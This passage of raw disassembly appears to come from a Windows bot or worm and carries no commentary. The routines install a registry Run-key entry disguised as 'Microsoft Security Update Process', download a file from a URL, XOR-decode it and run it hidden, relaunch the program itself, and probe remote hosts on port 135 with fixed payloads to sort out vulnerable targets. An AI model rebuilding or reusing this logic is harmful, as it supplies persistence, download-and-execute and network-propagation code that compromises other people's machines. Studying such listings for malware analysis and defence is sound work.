var_124 = byte ptr -124h
Str = byte ptr -0A4h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 328h
push esi
push edi
mov [ebp+var_4], 80h
and [ebp+var_8], 0
mov esi, [ebp+arg_0]
push 45h
pop ecx
lea edi, [ebp+var_128]
rep movsd
mov eax, [ebp+arg_0]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
mov dword ptr [eax+110h], 1
cmp [ebp+var_1C], 0
jnz short loc_409403
push 0
push [ebp+var_20]
push offset dword_4218C0
lea eax, [ebp+var_124]
push eax
push [ebp+var_128]
call sub_40A08D
add esp, 14h
loc_409403: ; CODE XREF: sub_4093A7+3B�j
movsx eax, [ebp+Str]
test eax, eax
jz short loc_40942A
lea eax, [ebp+Str]
push eax ; Str
call _atoi
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_40942A
mov eax, [ebp+var_8]
mov [ebp+var_4], eax
loc_40942A: ; CODE XREF: sub_4093A7+65�j
; sub_4093A7+7B�j
and [ebp+var_10], 0
and [ebp+var_14], 0
jmp short loc_409442
; ---------------------------------------------------------------------------
loc_409434: ; CODE XREF: sub_4093A7:loc_4094E9�j
mov eax, [ebp+var_10]
inc eax
mov [ebp+var_10], eax
mov eax, [ebp+var_14]
inc eax
mov [ebp+var_14], eax
loc_409442: ; CODE XREF: sub_4093A7+8B�j
cmp [ebp+var_10], 80h
jge loc_4094EE
mov eax, [ebp+var_14]
cmp eax, [ebp+var_4]
jge loc_4094EE
mov eax, [ebp+var_10]
shl eax, 7
movsx eax, byte_4267A8[eax]
test eax, eax
jz short loc_4094E9
movsx eax, [ebp+Str]
test eax, eax
jz short loc_40947D
cmp [ebp+var_8], 0
jz short loc_4094A5
loc_40947D: ; CODE XREF: sub_4093A7+CE�j
push 1
push [ebp+var_20]
mov eax, [ebp+var_10]
shl eax, 7
add eax, offset byte_4267A8
push eax
lea eax, [ebp+var_124]
push eax
push [ebp+var_128]
call sub_40A08D
add esp, 14h
jmp short loc_4094E9
; ---------------------------------------------------------------------------
loc_4094A5: ; CODE XREF: sub_4093A7+D4�j
lea eax, [ebp+Str]
push eax ; int
mov eax, [ebp+var_10]
shl eax, 7
add eax, offset byte_4267A8
push eax ; Str
call sub_408200
pop ecx
pop ecx
test eax, eax
jz short loc_4094E9
push 1
push [ebp+var_20]
mov eax, [ebp+var_10]
shl eax, 7
add eax, offset byte_4267A8
push eax
lea eax, [ebp+var_124]
push eax
push [ebp+var_128]
call sub_40A08D
add esp, 14h
loc_4094E9: ; CODE XREF: sub_4093A7+C3�j
; sub_4093A7+FC�j ...
jmp loc_409434
; ---------------------------------------------------------------------------
loc_4094EE: ; CODE XREF: sub_4093A7+A2�j
; sub_4093A7+AE�j
push offset dword_4218E0 ; Format
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
cmp [ebp+var_1C], 0
jnz short loc_409528
push 0
push [ebp+var_20]
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+var_124]
push eax
push [ebp+var_128]
call sub_40A08D
add esp, 14h
loc_409528: ; CODE XREF: sub_4093A7+15E�j
lea eax, [ebp+Dest]
push eax
call sub_40913D
pop ecx
push [ebp+var_24]
call sub_410709
pop ecx
push 0 ; dwExitCode
call ds:ExitThread ; ExitThread
sub_4093A7 endp
; ---------------------------------------------------------------------------
pop edi
pop esi
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40954C(char *Str)
sub_40954C proc near ; CODE XREF: sub_408651+1D�p
; WinMain(x,x,x,x)+409�p
var_8 = dword ptr -8
var_4 = dword ptr -4
Str = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_8], 0
jmp short loc_40955E
; ---------------------------------------------------------------------------
loc_409557: ; CODE XREF: sub_40954C+83�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_40955E: ; CODE XREF: sub_40954C+9�j
cmp [ebp+var_8], 3
jnb short locret_4095D1
push 0
lea eax, [ebp+var_4]
push eax
push 0
push 0F003Fh
push 0
push 0
push 0
mov eax, [ebp+var_8]
push off_421914[eax*8]
mov eax, [ebp+var_8]
push dword_421910[eax*8]
call dword_4263E4 ; RegCreateKeyExA
cmp [ebp+Str], 0
jz short loc_4095B8
push [ebp+Str] ; Str
call _strlen
pop ecx
push eax
push [ebp+Str]
push 1
push 0
push offset aMicrosoftSecur ; "Microsoft Security Update Process"
push [ebp+var_4]
call dword_426448 ; RegSetValueExA
jmp short loc_4095C6
; ---------------------------------------------------------------------------
loc_4095B8: ; CODE XREF: sub_40954C+49�j
push offset aMicrosoftSecur ; "Microsoft Security Update Process"
push [ebp+var_4]
call dword_4263A8 ; RegDeleteValueA
loc_4095C6: ; CODE XREF: sub_40954C+6A�j
push [ebp+var_4]
call dword_426404 ; RegCloseKey
jmp short loc_409557
; ---------------------------------------------------------------------------
locret_4095D1: ; CODE XREF: sub_40954C+16�j
leave
retn
sub_40954C endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
; DWORD __stdcall sub_4095D3(LPVOID)
sub_4095D3 proc near ; DATA XREF: sub_40ABFE+3C47�o
; sub_40ABFE+4221�o
var_564 = qword ptr -564h
var_558 = qword ptr -558h
var_548 = qword ptr -548h
var_540 = qword ptr -540h
var_538 = qword ptr -538h
var_530 = qword ptr -530h
ProcessInformation= _PROCESS_INFORMATION ptr -528h
StartupInfo = _STARTUPINFOA ptr -518h
Size = dword ptr -4D4h
var_4D0 = dword ptr -4D0h
hObject = dword ptr -4CCh
Memory = dword ptr -4C8h
var_4C4 = dword ptr -4C4h
Buffer = byte ptr -4C0h
var_2C0 = dword ptr -2C0h
var_2BC = dword ptr -2BCh
var_2B8 = dword ptr -2B8h
NumberOfBytesWritten= dword ptr -2B4h
nNumberOfBytesToWrite= dword ptr -2B0h
var_2AC = dword ptr -2ACh
var_2A8 = byte ptr -2A8h
var_228 = byte ptr -228h
CommandLine = byte ptr -128h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 548h
push esi
push edi
mov esi, [ebp+arg_0]
mov ecx, 0AAh
lea edi, [ebp+var_2AC]
rep movsd
mov eax, [ebp+arg_0]
mov [ebp+var_2C0], eax
mov eax, [ebp+var_2C0]
mov dword ptr [eax+2A4h], 1
push 0
push 0
push 0
push 0
lea eax, [ebp+var_228]
push eax
push dword_4263E0
call dword_42635C ; InternetOpenUrlA
mov [ebp+var_2B8], eax
cmp [ebp+var_2B8], 0
jz loc_409B7E
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 2 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 0 ; dwShareMode
push 40000000h ; dwDesiredAccess
lea eax, [ebp+CommandLine]
push eax ; lpFileName
call ds:CreateFileA ; CreateFileA
mov [ebp+hObject], eax
cmp [ebp+hObject], 1
jnb short loc_4096C0
lea eax, [ebp+CommandLine]
push eax
push offset unk_421928 ; Format
lea eax, [ebp+Buffer]
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_10], 0
jnz short loc_4096A2
push 0
push [ebp+var_C]
lea eax, [ebp+Buffer]
push eax
lea eax, [ebp+var_2A8]
push eax
push [ebp+var_2AC]
call sub_40A08D
add esp, 14h
loc_4096A2: ; CODE XREF: sub_4095D3+AC�j
lea eax, [ebp+Buffer]
push eax
call sub_40913D
pop ecx
push [ebp+var_28]
call sub_410709
pop ecx
push 0 ; dwExitCode
call ds:ExitThread ; ExitThread
; ---------------------------------------------------------------------------
loc_4096C0: ; CODE XREF: sub_4095D3+8B�j
and [ebp+var_2BC], 0
call ds:GetTickCount ; GetTickCount
mov [ebp+var_4C4], eax
push 7D000h ; Size
call _malloc
pop ecx
mov [ebp+Memory], eax
loc_4096E4: ; CODE XREF: sub_4095D3+269�j
push 200h ; Size
push 0 ; Val
lea eax, [ebp+Buffer]
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+nNumberOfBytesToWrite]
push eax
push 200h
lea eax, [ebp+Buffer]
push eax
push [ebp+var_2B8]
call dword_426364 ; InternetReadFile
cmp [ebp+var_14], 0
jz short loc_409733
push [ebp+nNumberOfBytesToWrite]
lea eax, [ebp+Buffer]
push eax
call sub_409BF2
pop ecx
pop ecx
loc_409733: ; CODE XREF: sub_4095D3+14A�j
push 0 ; lpOverlapped
lea eax, [ebp+NumberOfBytesWritten]
push eax ; lpNumberOfBytesWritten
push [ebp+nNumberOfBytesToWrite] ; nNumberOfBytesToWrite
lea eax, [ebp+Buffer]
push eax ; lpBuffer
push [ebp+hObject] ; hFile
call ds:WriteFile ; WriteFile
cmp [ebp+var_2BC], 7D000h
jnb short loc_4097AE
mov eax, 7D000h
sub eax, [ebp+var_2BC]
mov [ebp+Size], eax
mov eax, [ebp+Size]
cmp eax, [ebp+nNumberOfBytesToWrite]
jbe short loc_40978C
mov eax, [ebp+nNumberOfBytesToWrite]
mov [ebp+Size], eax
loc_40978C: ; CODE XREF: sub_4095D3+1AB�j
push [ebp+Size] ; Size
lea eax, [ebp+Buffer]
push eax ; Src
mov eax, [ebp+Memory]
add eax, [ebp+var_2BC]
push eax ; Dst
call _memcpy
add esp, 0Ch
loc_4097AE: ; CODE XREF: sub_4095D3+18C�j
mov eax, [ebp+var_2BC]
add eax, [ebp+nNumberOfBytesToWrite]
mov [ebp+var_2BC], eax
cmp [ebp+var_1C], 0
jz short loc_4097D3
mov eax, [ebp+var_2BC]
cmp eax, [ebp+var_1C]
jbe short loc_4097D3
jmp short loc_409842
; ---------------------------------------------------------------------------
loc_4097D3: ; CODE XREF: sub_4095D3+1F1�j
; sub_4095D3+1FC�j
cmp [ebp+var_24], 1
jz short loc_409808
mov eax, [ebp+var_2BC]
shr eax, 0Ah
push eax
lea eax, [ebp+var_228]
push eax
push offset unk_421960 ; Format
mov eax, [ebp+var_28]
imul eax, 234h
add eax, offset byte_42B340
push eax ; Dest
call _sprintf
add esp, 10h
jmp short loc_409835
; ---------------------------------------------------------------------------
loc_409808: ; CODE XREF: sub_4095D3+204�j
mov eax, [ebp+var_2BC]
shr eax, 0Ah
push eax
lea eax, [ebp+var_228]
push eax
push offset unk_4219A8 ; Format
mov eax, [ebp+var_28]
imul eax, 234h
add eax, offset byte_42B340
push eax ; Dest
call _sprintf
add esp, 10h
loc_409835: ; CODE XREF: sub_4095D3+233�j
cmp [ebp+nNumberOfBytesToWrite], 0
ja loc_4096E4
loc_409842: ; CODE XREF: sub_4095D3+1FE�j
mov [ebp+var_4D0], 1
cmp [ebp+var_1C], 0
jz short loc_4098AF
mov eax, [ebp+var_2BC]
cmp eax, [ebp+var_1C]
jz short loc_4098AF
and [ebp+var_4D0], 0
push [ebp+var_1C]
push [ebp+var_2BC]
push offset unk_4219E8 ; Format
lea eax, [ebp+Buffer]
push eax ; Dest
call _sprintf
add esp, 10h
push 0
push [ebp+var_C]
lea eax, [ebp+Buffer]
push eax
lea eax, [ebp+var_2A8]
push eax
push [ebp+var_2AC]
call sub_40A08D
add esp, 14h
lea eax, [ebp+Buffer]
push eax
call sub_40913D
pop ecx
loc_4098AF: ; CODE XREF: sub_4095D3+27D�j
; sub_4095D3+288�j
call ds:GetTickCount ; GetTickCount
sub eax, [ebp+var_4C4]
xor edx, edx
mov ecx, 3E8h
div ecx
mov ecx, eax
inc ecx
mov eax, [ebp+var_2BC]
xor edx, edx
div ecx
mov [ebp+var_4], eax
push [ebp+hObject] ; hObject
call ds:CloseHandle ; CloseHandle
push [ebp+Memory] ; Memory
call _free
pop ecx
cmp [ebp+var_4D0], 0
jnz short loc_4098FA
jmp loc_409BEA
; ---------------------------------------------------------------------------
loc_4098FA: ; CODE XREF: sub_4095D3+320�j
cmp [ebp+var_24], 1
jz loc_409A0C
mov eax, [ebp+var_4]
mov dword ptr [ebp+var_530], eax
and dword ptr [ebp+var_530+4], 0
fild [ebp+var_530]
fdiv ds:dbl_41C238
push ecx
push ecx
fstp [esp+558h+var_558]
lea eax, [ebp+CommandLine]
push eax
mov eax, [ebp+var_2BC]
mov dword ptr [ebp+var_538], eax
and dword ptr [ebp+var_538+4], 0
fild [ebp+var_538]
fdiv ds:dbl_41C238
push ecx
push ecx
fstp [esp+564h+var_564]
push offset unk_421A2C ; Format
lea eax, [ebp+Buffer]
push eax ; Dest
call _sprintf
add esp, 1Ch
cmp [ebp+var_10], 0
jnz short loc_40998B
push 0
push [ebp+var_C]
lea eax, [ebp+Buffer]
push eax
lea eax, [ebp+var_2A8]
push eax
push [ebp+var_2AC]
call sub_40A08D
add esp, 14h
loc_40998B: ; CODE XREF: sub_4095D3+395�j
lea eax, [ebp+Buffer]
push eax
call sub_40913D
pop ecx
cmp [ebp+var_20], 1
jnz short loc_409A07
push 5
push 0
push 0
lea eax, [ebp+CommandLine]
push eax
push offset aOpen ; "open"
push 0
call dword_4263B0 ; ShellExecuteA
cmp [ebp+var_10], 0
jnz short loc_409A07
lea eax, [ebp+CommandLine]
push eax
push offset dword_421A7C ; Format
lea eax, [ebp+Buffer]
push eax ; Dest
call _sprintf
add esp, 0Ch
push 0
push [ebp+var_C]
lea eax, [ebp+Buffer]
push eax
lea eax, [ebp+var_2A8]
push eax
push [ebp+var_2AC]
call sub_40A08D
add esp, 14h
lea eax, [ebp+Buffer]
push eax
call sub_40913D
pop ecx
loc_409A07: ; CODE XREF: sub_4095D3+3C9�j
; sub_4095D3+3E9�j
jmp loc_409B7C
; ---------------------------------------------------------------------------
loc_409A0C: ; CODE XREF: sub_4095D3+32B�j
mov eax, [ebp+var_4]
mov dword ptr [ebp+var_540], eax
and dword ptr [ebp+var_540+4], 0
fild [ebp+var_540]
fdiv ds:dbl_41C238
push ecx
push ecx
fstp [esp+558h+var_558]
lea eax, [ebp+CommandLine]
push eax
mov eax, [ebp+var_2BC]
mov dword ptr [ebp+var_548], eax
and dword ptr [ebp+var_548+4], 0
fild [ebp+var_548]
fdiv ds:dbl_41C238
push ecx
push ecx
fstp [esp+564h+var_564]
push offset unk_421AA8 ; Format
lea eax, [ebp+Buffer]
push eax ; Dest
call _sprintf
add esp, 1Ch
cmp [ebp+var_10], 0
jnz short loc_409A93
push 0
push [ebp+var_C]
lea eax, [ebp+Buffer]
push eax
lea eax, [ebp+var_2A8]
push eax
push [ebp+var_2AC]
call sub_40A08D
add esp, 14h
loc_409A93: ; CODE XREF: sub_4095D3+49D�j
lea eax, [ebp+Buffer]
push eax
call sub_40913D
pop ecx
push 10h ; Size
push 0 ; Val
lea eax, [ebp+ProcessInformation]
push eax ; Dst
call _memset
add esp, 0Ch
push 44h ; Size
push 0 ; Val
lea eax, [ebp+StartupInfo]
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+StartupInfo.lpTitle], offset dword_42A7B0
mov [ebp+StartupInfo.cb], 44h
mov [ebp+StartupInfo.dwFlags], 1
and [ebp+StartupInfo.wShowWindow], 0
lea eax, [ebp+ProcessInformation]
push eax ; lpProcessInformation
lea eax, [ebp+StartupInfo]
push eax ; lpStartupInfo
push 0 ; lpCurrentDirectory
push 0 ; lpEnvironment
push 28h ; dwCreationFlags
push 0 ; bInheritHandles
push 0 ; lpThreadAttributes
push 0 ; lpProcessAttributes
lea eax, [ebp+CommandLine]
push eax ; lpCommandLine
push 0 ; lpApplicationName
call ds:CreateProcessA ; CreateProcessA
cmp eax, 1
jnz short loc_409B2D
call dword_42639C ; WSACleanup
call sub_408651
push 0 ; uExitCode
call ds:ExitProcess ; ExitProcess
; ---------------------------------------------------------------------------
loc_409B2D: ; CODE XREF: sub_4095D3+545�j
lea eax, [ebp+CommandLine]
push eax
push offset unk_421AF8 ; Format
lea eax, [ebp+Buffer]
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_10], 0
jnz short loc_409B6F
push 0
push [ebp+var_C]
lea eax, [ebp+Buffer]
push eax
lea eax, [ebp+var_2A8]
push eax
push [ebp+var_2AC]
call sub_40A08D
add esp, 14h
loc_409B6F: ; CODE XREF: sub_4095D3+579�j
lea eax, [ebp+Buffer]
push eax
call sub_40913D
pop ecx
loc_409B7C: ; CODE XREF: sub_4095D3:loc_409A07�j
jmp short loc_409BCD
; ---------------------------------------------------------------------------
loc_409B7E: ; CODE XREF: sub_4095D3+5C�j
lea eax, [ebp+var_228]
push eax
push offset unk_421B40 ; Format
lea eax, [ebp+Buffer]
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_10], 0
jnz short loc_409BC0
push 0
push [ebp+var_C]
lea eax, [ebp+Buffer]
push eax
lea eax, [ebp+var_2A8]
push eax
push [ebp+var_2AC]
call sub_40A08D
add esp, 14h
loc_409BC0: ; CODE XREF: sub_4095D3+5CA�j
lea eax, [ebp+Buffer]
push eax
call sub_40913D
pop ecx
loc_409BCD: ; CODE XREF: sub_4095D3:loc_409B7C�j
; sub_4095D3:loc_409BEA�j
push [ebp+var_2B8]
call dword_426454 ; InternetCloseHandle
push [ebp+var_28]
call sub_410709
pop ecx
push 0 ; dwExitCode
call ds:ExitThread ; ExitThread
; ---------------------------------------------------------------------------
loc_409BEA: ; CODE XREF: sub_4095D3+322�j
jmp short loc_409BCD
sub_4095D3 endp
; ---------------------------------------------------------------------------
pop edi
pop esi
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409BF2 proc near ; CODE XREF: sub_4095D3+159�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_409C03
; ---------------------------------------------------------------------------
loc_409BFC: ; CODE XREF: sub_409BF2+2F�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_409C03: ; CODE XREF: sub_409BF2+8�j
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_4]
jge short loc_409C23
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
xor al, byte_421C44
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
jmp short loc_409BFC
; ---------------------------------------------------------------------------
loc_409C23: ; CODE XREF: sub_409BF2+17�j
mov eax, [ebp+arg_0]
leave
retn
sub_409BF2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_409C28 proc near ; DATA XREF: WinMain(x,x,x,x)+28�o
var_268 = dword ptr -268h
ProcessInformation= _PROCESS_INFORMATION ptr -25Ch
CurrentDirectory= byte ptr -24Ch
StartupInfo = _STARTUPINFOA ptr -148h
CommandLine = byte ptr -104h
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 25Ch
push ebx
push esi
push edi
push dword_42B54C
call dword_4264B8 ; closesocket
call sub_41050C
call dword_42639C ; WSACleanup
call dword_42639C ; WSACleanup
push 64h ; dwMilliseconds
call ds:Sleep ; Sleep
push 10h ; Size
push 0 ; Val
lea eax, [ebp+ProcessInformation]
push eax ; Dst
call _memset
add esp, 0Ch
push 44h ; Size
push 0 ; Val
lea eax, [ebp+StartupInfo]
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+StartupInfo.lpTitle], offset dword_42A7BC
mov [ebp+StartupInfo.cb], 44h
mov [ebp+StartupInfo.dwFlags], 1
and [ebp+StartupInfo.wShowWindow], 0
push 104h ; uSize
lea eax, [ebp+CurrentDirectory]
push eax ; lpBuffer
call ds:GetWindowsDirectoryA ; GetWindowsDirectoryA
push 104h ; nSize
lea eax, [ebp+CommandLine]
push eax ; lpFilename
push 0 ; hModule
call ds:GetModuleFileNameA ; GetModuleFileNameA
lea eax, [ebp+ProcessInformation]
push eax ; lpProcessInformation
lea eax, [ebp+StartupInfo]
push eax ; lpStartupInfo
lea eax, [ebp+CurrentDirectory]
push eax ; lpCurrentDirectory
push 0 ; lpEnvironment
push 28h ; dwCreationFlags
push 1 ; bInheritHandles
push 0 ; lpThreadAttributes
push 0 ; lpProcessAttributes
lea eax, [ebp+CommandLine]
push eax ; lpCommandLine
push 0 ; lpApplicationName
call ds:CreateProcessA ; CreateProcessA
test eax, eax
jz short loc_409D1D
push 64h ; dwMilliseconds
call ds:Sleep ; Sleep
push [ebp+ProcessInformation.hProcess] ; hObject
call ds:CloseHandle ; CloseHandle
push [ebp+ProcessInformation.hThread] ; hObject
call ds:CloseHandle ; CloseHandle
loc_409D1D: ; CODE XREF: sub_409C28+D3�j
mov eax, [ebp+arg_8]
mov dword ptr [eax+0B0h], offset dword_42A7B4
mov eax, [esp+268h+var_268]
mov large fs:0, eax
add esp, 8
push 0 ; uExitCode
call ds:ExitProcess ; ExitProcess
sub_409C28 endp
; ---------------------------------------------------------------------------
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_409D43(int, int, void *Buf2, size_t Size)
sub_409D43 proc near ; CODE XREF: sub_409D82+1D7�p
; sub_409D82+21E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
Buf2 = dword ptr 10h
Size = dword ptr 14h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_409D54
; ---------------------------------------------------------------------------
loc_409D4D: ; CODE XREF: sub_409D43:loc_409D7C�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_409D54: ; CODE XREF: sub_409D43+8�j
mov eax, [ebp+arg_4]
sub eax, [ebp+Size]
cmp [ebp+var_4], eax
jge short loc_409D7E
push [ebp+Size] ; Size
push [ebp+Buf2] ; Buf2
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
push eax ; Buf1
call _memcmp
add esp, 0Ch
test eax, eax
jnz short loc_409D7C
mov al, 1
jmp short locret_409D80
; ---------------------------------------------------------------------------
loc_409D7C: ; CODE XREF: sub_409D43+33�j
jmp short loc_409D4D
; ---------------------------------------------------------------------------
loc_409D7E: ; CODE XREF: sub_409D43+1A�j
xor al, al
locret_409D80: ; CODE XREF: sub_409D43+37�j
leave
retn
sub_409D43 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409D82 proc near ; CODE XREF: sub_4016C0+96�p
; sub_4016C0+241�p
var_2020 = dword ptr -2020h
var_201C = dword ptr -201Ch
Dst = word ptr -2018h
var_2016 = word ptr -2016h
var_2014 = dword ptr -2014h
var_2008 = dword ptr -2008h
var_2004 = dword ptr -2004h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 2020h
call __alloca_probe
mov eax, [ebp+arg_4]
mov [ebp+var_2020], eax
cmp [ebp+var_2020], 1
jz short loc_409DC0
cmp [ebp+var_2020], 2
jz loc_40A00C
cmp [ebp+var_2020], 3
jz loc_40A030
jmp loc_40A034
; ---------------------------------------------------------------------------
loc_409DC0: ; CODE XREF: sub_409D82+1D�j
and [ebp+var_201C], 0
push 6
push 1
push 2
call dword_4264A0 ; socket
mov [ebp+var_4], eax
cmp [ebp+var_4], 0FFFFFFFFh
jz short loc_409DE2
cmp [ebp+var_4], 0FFFFFFFFh
jnz short loc_409DE9
loc_409DE2: ; CODE XREF: sub_409D82+58�j
xor eax, eax
jmp locret_40A03A
; ---------------------------------------------------------------------------
loc_409DE9: ; CODE XREF: sub_409D82+5E�j
push 10h ; Size
push 0 ; Val
lea eax, [ebp+Dst]
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push 87h
call dword_426424 ; ntohs
mov [ebp+var_2016], ax
push [ebp+arg_0]
call sub_4088D0
pop ecx
mov [ebp+var_2014], eax
push 10h
lea eax, [ebp+Dst]
push eax
push [ebp+var_4]
call dword_4263D8 ; connect
mov [ebp+var_2008], eax
cmp [ebp+var_2008], 0FFFFFFFFh
jz loc_409FEA
push 0
push 48h
push offset dword_421B7C
push [ebp+var_4]
call dword_426470 ; send
mov [ebp+var_2008], eax
cmp [ebp+var_2008], 0FFFFFFFFh
jnz short loc_409E80
push [ebp+var_4]
call dword_4264B8 ; closesocket
mov eax, [ebp+var_201C]
jmp locret_40A03A
; ---------------------------------------------------------------------------
loc_409E80: ; CODE XREF: sub_409D82+E8�j
push 0
push 2000h
lea eax, [ebp+var_2004]
push eax
push [ebp+var_4]
call dword_42643C ; recv
mov [ebp+var_2008], eax
cmp [ebp+var_2008], 0FFFFFFFFh
jnz short loc_409EBA
push [ebp+var_4]
call dword_4264B8 ; closesocket
mov eax, [ebp+var_201C]
jmp locret_40A03A
; ---------------------------------------------------------------------------
loc_409EBA: ; CODE XREF: sub_409D82+122�j
movsx eax, byte ptr [ebp+var_2004+2]
cmp eax, 0Ch
jnz loc_409FD7
push 0
push 18h
push offset dword_421BC8
push [ebp+var_4]
call dword_426470 ; send
mov [ebp+var_2008], eax
cmp [ebp+var_2008], 0FFFFFFFFh
jnz short loc_409EFF
push [ebp+var_4]
call dword_4264B8 ; closesocket
mov eax, [ebp+var_201C]
jmp locret_40A03A
; ---------------------------------------------------------------------------
loc_409EFF: ; CODE XREF: sub_409D82+167�j
push 0
push 2000h
lea eax, [ebp+var_2004]
push eax
push [ebp+var_4]
call dword_42643C ; recv
mov [ebp+var_2008], eax
cmp [ebp+var_2008], 0FFFFFFFFh
jnz short loc_409F39
push [ebp+var_4]
call dword_4264B8 ; closesocket
mov eax, [ebp+var_201C]
jmp locret_40A03A
; ---------------------------------------------------------------------------
loc_409F39: ; CODE XREF: sub_409D82+1A1�j
movsx eax, byte ptr [ebp+var_2004+2]
cmp eax, 2
jnz short loc_409FC4
push 10h ; Size
push offset dword_421BE4 ; Buf2
push [ebp+var_2008] ; int
lea eax, [ebp+var_2004]
push eax ; int
call sub_409D43
add esp, 10h
movzx eax, al
test eax, eax
jz short loc_409F8C
cmp [ebp+var_2008], 12Ch
jge short loc_409F80
mov [ebp+var_201C], 1
jmp short loc_409F8A
; ---------------------------------------------------------------------------
loc_409F80: ; CODE XREF: sub_409D82+1F0�j
mov [ebp+var_201C], 2
loc_409F8A: ; CODE XREF: sub_409D82+1FC�j
jmp short loc_409FC2
; ---------------------------------------------------------------------------
loc_409F8C: ; CODE XREF: sub_409D82+1E4�j
push 10h ; Size
push offset dword_421BF8 ; Buf2
push [ebp+var_2008] ; int
lea eax, [ebp+var_2004]
push eax ; int
call sub_409D43
add esp, 10h
movzx eax, al
test eax, eax
jz short loc_409FBB
mov [ebp+var_201C], 3
jmp short loc_409FC2
; ---------------------------------------------------------------------------
loc_409FBB: ; CODE XREF: sub_409D82+22B�j
and [ebp+var_201C], 0
loc_409FC2: ; CODE XREF: sub_409D82:loc_409F8A�j
; sub_409D82+237�j
jmp short loc_409FD5
; ---------------------------------------------------------------------------
loc_409FC4: ; CODE XREF: sub_409D82+1C1�j
push [ebp+var_4]
call dword_4264B8 ; closesocket
mov eax, [ebp+var_201C]
jmp short locret_40A03A
; ---------------------------------------------------------------------------
loc_409FD5: ; CODE XREF: sub_409D82:loc_409FC2�j
jmp short loc_409FE8
; ---------------------------------------------------------------------------
loc_409FD7: ; CODE XREF: sub_409D82+142�j
push [ebp+var_4]
call dword_4264B8 ; closesocket
mov eax, [ebp+var_201C]
jmp short locret_40A03A
; ---------------------------------------------------------------------------
loc_409FE8: ; CODE XREF: sub_409D82:loc_409FD5�j
jmp short loc_409FFB
; ---------------------------------------------------------------------------
loc_409FEA: ; CODE XREF: sub_409D82+C3�j
push [ebp+var_4]
call dword_4264B8 ; closesocket
mov eax, [ebp+var_201C]
jmp short locret_40A03A
; ---------------------------------------------------------------------------
loc_409FFB: ; CODE XREF: sub_409D82:loc_409FE8�j
push [ebp+var_4]
call dword_4264B8 ; closesocket
mov eax, [ebp+var_201C]
jmp short locret_40A03A
; ---------------------------------------------------------------------------
loc_40A00C: ; CODE XREF: sub_409D82+26�j
push 3
push 1388h
push [ebp+arg_0]
call dword_426460 ; inet_addr
push eax
call sub_405369
add esp, 0Ch
test eax, eax
jz short loc_40A02E
push 3
pop eax
jmp short locret_40A03A
; ---------------------------------------------------------------------------
loc_40A02E: ; CODE XREF: sub_409D82+2A5�j
jmp short loc_40A038
; ---------------------------------------------------------------------------
loc_40A030: ; CODE XREF: sub_409D82+33�j
xor eax, eax
jmp short locret_40A03A
; ---------------------------------------------------------------------------
loc_40A034: ; CODE XREF: sub_409D82+39�j
xor eax, eax
jmp short locret_40A03A
; ---------------------------------------------------------------------------
loc_40A038: ; CODE XREF: sub_409D82:loc_40A02E�j
xor eax, eax
locret_40A03A: ; CODE XREF: sub_409D82+62�j
; sub_409D82+F9�j ...
leave
retn
sub_409D82 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40A03C(int, char *Format, char)
sub_40A03C proc near ; CODE XREF: sub_40A9EB+5B�p
; sub_40ABFE+2C4�p ...
Args = dword ptr -204h
Dest = byte ptr -200h
arg_0 = dword ptr 8
Format = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 204h
lea eax, [ebp+arg_8]
mov [ebp+Args], eax
push [ebp+Args] ; Args
push [ebp+Format] ; Format
push 200h ; Count
lea eax, [ebp+Dest]
push eax ; Dest
call __vsnprintf
add esp, 10h
push 0
lea eax, [ebp+Dest]
push eax ; Str
call _strlen
pop ecx
push eax
